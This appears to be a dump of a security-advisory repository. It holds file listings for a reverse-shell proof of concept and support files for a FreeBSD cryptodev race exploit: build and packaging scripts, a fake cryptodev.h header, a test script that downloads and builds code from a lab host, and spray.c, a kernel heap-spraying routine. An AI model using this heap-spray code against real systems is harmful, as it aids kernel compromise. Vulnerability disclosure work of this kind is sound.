https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.xterm-r6 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.xterm-xfree86: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.xterm-xfree86 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen2 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen3 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+ -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+enq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+enq -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+fnkeys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+fnkeys -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+keypad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+keypad -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+pfkeys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100+pfkeys -------------------------------------------------------------------------------- /SSD 
Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-am: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-am -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-bm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-bm -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-bm-o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-bm-o -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-bot-s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-bot-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nam 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nam-w: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nam-w -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nav -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nav-w: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-nav-w -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-putty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-putty -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD 
Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-s-bot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-s-bot -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-s-top: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-s-top -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-top-s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-top-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-vb -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-am: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-am -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nam -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100-w-nav -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/76/vt100nam -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/78/xterm-256color: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/78/xterm-256color -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Removes old objects, then compiles hack.c and spray.c and links them into ./hack. 3 | echo "Cleaning up old objects" 4 | 5 | { 6 | rm -f *.o hack 7 | echo "Cleanup complete" 8 | } || { 9 | echo "Failed to cleanup" 10 | exit 1 11 | } 12 | 13 | CC=gcc 14 | CLFAGS="-std=c11" # NOTE(review): "CLFAGS" looks like a typo for CFLAGS; as written, -std=c11 reaches the compiler only through the freebsd-version branch below 15 | 16 | if [ "$(which freebsd-version)" != '' ]; then 17 | CFLAGS="$CLFAGS -DREAL_BUILD=1" 18 | echo "Found other compiler"; 19 | fi 20 | # NOTE(review): the status of the group below is that of its final echo, so a failed compile or link does not reach the "Failed to build." branch and the script still exits 0; the cleanup group above has the same shape. 21 | { 22 | echo "Building..." 23 | $CC -g -c $CFLAGS hack.c -o hack.o && \ 24 | $CC -g -c $CFLAGS spray.c -o spray.o && \ 25 | $CC hack.o spray.o -o hack -g -lpthread 26 | echo "Done." 27 | } || { 28 | echo "Failed to build." 29 | exit 1 30 | } 31 | -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/fake_cryptodev.h: -------------------------------------------------------------------------------- 1 | /** 2 | * NOTE: this file is just a fake cryptodev.h used for 3 | * linting on the host computer. most of these are just 4 | * definitions that have been straight ripped out of the 5 | * FreeBSD sources. 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | #define CIOCGSESSION 3224396645 12 | #define CIOCCRYPT 3224396647 13 | #define CIOCFSESSION 2147771238 14 | #define CRIOGET 3221513060 15 | 16 | #define CRYPTO_AES_CBC 11 17 | #define CRYPTO_NULL_CBC 0 18 | #define CRYPTO_NULL_HMAC 0 19 | 20 | typedef const char* c_caddr_t; 21 | 22 | struct session_op { 23 | u_int32_t cipher; /* ie. CRYPTO_DES_CBC */ 24 | u_int32_t mac; /* ie. 
CRYPTO_MD5_HMAC */ 25 | 26 | u_int32_t keylen; /* cipher key */ 27 | c_caddr_t key; 28 | int mackeylen; /* mac key */ 29 | c_caddr_t mackey; 30 | 31 | u_int32_t ses; /* returns: session # */ 32 | }; 33 | 34 | /* 35 | * session and crypt _op structs are used by userspace programs to interact 36 | * with /dev/crypto. Confusingly, the internal kernel interface is named 37 | * "cryptop" (no underscore). 38 | */ 39 | struct session2_op { 40 | u_int32_t cipher; /* ie. CRYPTO_DES_CBC */ 41 | u_int32_t mac; /* ie. CRYPTO_MD5_HMAC */ 42 | 43 | u_int32_t keylen; /* cipher key */ 44 | c_caddr_t key; 45 | int mackeylen; /* mac key */ 46 | c_caddr_t mackey; 47 | 48 | u_int32_t ses; /* returns: session # */ 49 | int crid; /* driver id + flags (rw) */ 50 | int pad[4]; /* for future expansion */ 51 | }; 52 | 53 | struct crypt_op { 54 | u_int32_t ses; 55 | u_int16_t op; /* i.e. COP_ENCRYPT */ 56 | #define COP_ENCRYPT 1 57 | #define COP_DECRYPT 2 58 | u_int16_t flags; 59 | #define COP_F_CIPHER_FIRST 0x0001 /* Cipher before MAC. */ 60 | #define COP_F_BATCH 0x0008 /* Batch op if possible */ 61 | u_int len; 62 | c_caddr_t src; /* become iov[] inside kernel */ 63 | caddr_t dst; 64 | caddr_t mac; /* must be big enough for chosen MAC */ 65 | c_caddr_t iv; 66 | }; 67 | 68 | /* op and flags the same as crypt_op */ 69 | struct crypt_aead { 70 | u_int32_t ses; 71 | u_int16_t op; /* i.e. COP_ENCRYPT */ 72 | u_int16_t flags; 73 | u_int len; 74 | u_int aadlen; 75 | u_int ivlen; 76 | c_caddr_t src; /* become iov[] inside kernel */ 77 | caddr_t dst; 78 | c_caddr_t aad; /* additional authenticated data */ 79 | caddr_t tag; /* must fit for chosen TAG length */ 80 | c_caddr_t iv; 81 | }; 82 | 83 | /* 84 | * Parameters for looking up a crypto driver/device by 85 | * device name or by id. The latter are returned for 86 | * created sessions (crid) and completed key operations. 
87 | */ 88 | struct crypt_find_op { 89 | int crid; /* driver id + flags */ 90 | char name[32]; /* device/driver name */ 91 | }; 92 | 93 | /* bignum parameter, in packed bytes, ... */ 94 | struct crparam { 95 | caddr_t crp_p; 96 | u_int crp_nbits; 97 | }; 98 | 99 | #define CRK_MAXPARAM 8 100 | 101 | struct crypt_kop { 102 | u_int crk_op; /* ie. CRK_MOD_EXP or other */ 103 | u_int crk_status; /* return status */ 104 | u_short crk_iparams; /* # of input parameters */ 105 | u_short crk_oparams; /* # of output parameters */ 106 | u_int crk_crid; /* NB: only used by CIOCKEY2 (rw) */ 107 | struct crparam crk_param[CRK_MAXPARAM]; 108 | }; -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/package.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | NAME=${PWD##*/} 4 | rm -f $NAME.tar.gz 5 | COPYFILE_DISABLE=1 tar zcvf $NAME.tar.gz build.sh package.sh test.sh $(ls *.c) $(ls *.h) writeup.md writeup.pdf -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/spray.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define SYS_IOCTL_SMALL_SIZE 128 /* bytes */ 9 | #define DEBUG 0 10 | 11 | void spray(unsigned int spray_count, void* spray, unsigned int spray_length) { 12 | if ( spray_length <= SYS_IOCTL_SMALL_SIZE ) { 13 | for ( unsigned int i = 0; i < spray_count; i++ ) { 14 | struct mac m = (struct mac) { 15 | .m_buflen = spray_length, 16 | .m_string = spray 17 | }; 18 | 19 | if ( mac_set_fd(-1, &m) != 0 ) { 20 | if ( DEBUG ) perror("__mac_set_fd"); 21 | } 22 | } 23 | } 24 | else if ( spray_length < IOCPARM_MAX ) { 25 | unsigned long cmd = (spray_length << 16) | IOC_IN; 26 | 27 | for ( unsigned int i = 0; i < spray_count; i++ ) { 28 | if ( ioctl(0, cmd, spray) != 0 ) { 29 | if ( DEBUG ) perror("spray 
ioctl: "); 30 | } 31 | } 32 | } 33 | else { 34 | printf("spray length %u invalid (max %u)\n", spray_length, IOCPARM_MAX); 35 | exit(1); 36 | } 37 | } -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/spray.h: -------------------------------------------------------------------------------- 1 | void spray(unsigned int spray_count, void* spray, unsigned int spray_length); -------------------------------------------------------------------------------- /SSD Advisory - 4147/POC/test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Loads the cryptodev and aesni kernel modules, fetches $SOURCE_PROJ.tar.gz from $SOURCE_HOST:8000 into test/, unpacks it there and runs its build.sh. 3 | SOURCE_HOST=192.168.56.1 # virtualbox host IP 4 | SOURCE_PROJ=cryptodev_race # project being downloaded 5 | # NOTE(review): kldload normally needs root, so the download and build below presumably run as root too - confirm. 6 | echo "Loading cryptodev" 7 | { 8 | kldload cryptodev && \ 9 | kldload aesni 10 | } || { 11 | echo "cryptodev failed to load or already loaded" 12 | } 13 | 14 | # Download: the archive is fetched over cleartext HTTP and unpacked with no checksum or signature check before build.sh from it is executed; test/ is wiped first. 15 | echo "Downloading project" 16 | { 17 | rm -rf test/ && \ 18 | mkdir test/ && \ 19 | wget http://$SOURCE_HOST:8000/$SOURCE_PROJ.tar.gz -O test/abc.tar.gz --quiet && \ 20 | tar -zxf test/abc.tar.gz -C test/ 21 | } || { 22 | echo "Failed to download latest project" 23 | exit 1 24 | } 25 | 26 | echo "Building project" 27 | { 28 | cd test/ &&\ 29 | sh build.sh 30 | } || { 31 | echo "Failed to compile" 32 | exit 1 33 | } 34 | -------------------------------------------------------------------------------- /license.md: -------------------------------------------------------------------------------- 1 | This work is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. 2 | --------------------------------------------------------------------------------